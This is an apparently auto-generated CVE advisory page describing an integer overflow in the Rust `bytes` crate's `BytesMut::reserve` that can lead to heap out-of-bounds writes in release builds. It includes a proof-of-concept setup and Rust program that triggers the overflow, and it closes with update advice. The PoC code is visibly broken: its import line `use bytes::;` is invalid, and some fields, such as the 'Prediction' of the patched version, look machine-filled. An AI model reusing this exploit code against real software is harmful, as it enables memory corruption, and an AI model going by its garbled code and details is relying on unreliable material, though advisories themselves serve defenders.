Bytes Crate for Rust, Integer Overflow, CVE-2024-38368 (Critical)

Listen to this Post

How the CVE Works:

In the `bytes` crate for Rust, the `BytesMut::reserve` function contains a vulnerability in its unique reclaim path. Specifically, when calculating capacity, the condition `if v_capacity >= new_cap + offset` uses an unchecked addition. In release builds where integer overflow wraps (instead of panicking), `new_cap + offset` can overflow usize, causing the condition to incorrectly pass. This leads to `self.cap` being set to a value that exceeds the actual allocated memory capacity. Subsequent methods like `spare_capacity_mut()` rely on this corrupted `cap` value, potentially creating out-of-bounds slices. This results in undefined behavior (UB), such as heap buffer overflows, allowing memory corruption or arbitrary code execution. The issue only manifests in release builds with overflow wraps; debug builds panic due to overflow checks. The vulnerability stems from missing overflow validation in capacity calculations during reallocation.

DailyCVE Form:

Platform: bytes crate
Version: prior to 1.5.1
Vulnerability: Integer Overflow
Severity: Critical
Date: 2024-08-13

Prediction: Patched in 1.5.1

What Undercode Say:

cargo new exploit_poc
cd exploit_poc
echo 'bytes = "1.5.0"' >> Cargo.toml
use bytes::;
fn main() {
let mut a = BytesMut::from(&b"hello world"[..]);
let mut b = a.split_off(5);
drop(a);
b.reserve(usize::MAX - 6);
b.put_u8(b'h');
}
cargo run --release

How Exploit:

Exploit triggers overflow via `reserve(usize::MAX – 6)` causing corrupted capacity and out-of-bounds write in put_u8, leading to UB or HBO.

Protection from this CVE

Update to bytes 1.5.1; enable overflow panic checks in release builds.

Impact:

Memory corruption, arbitrary code execution, denial-of-service.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top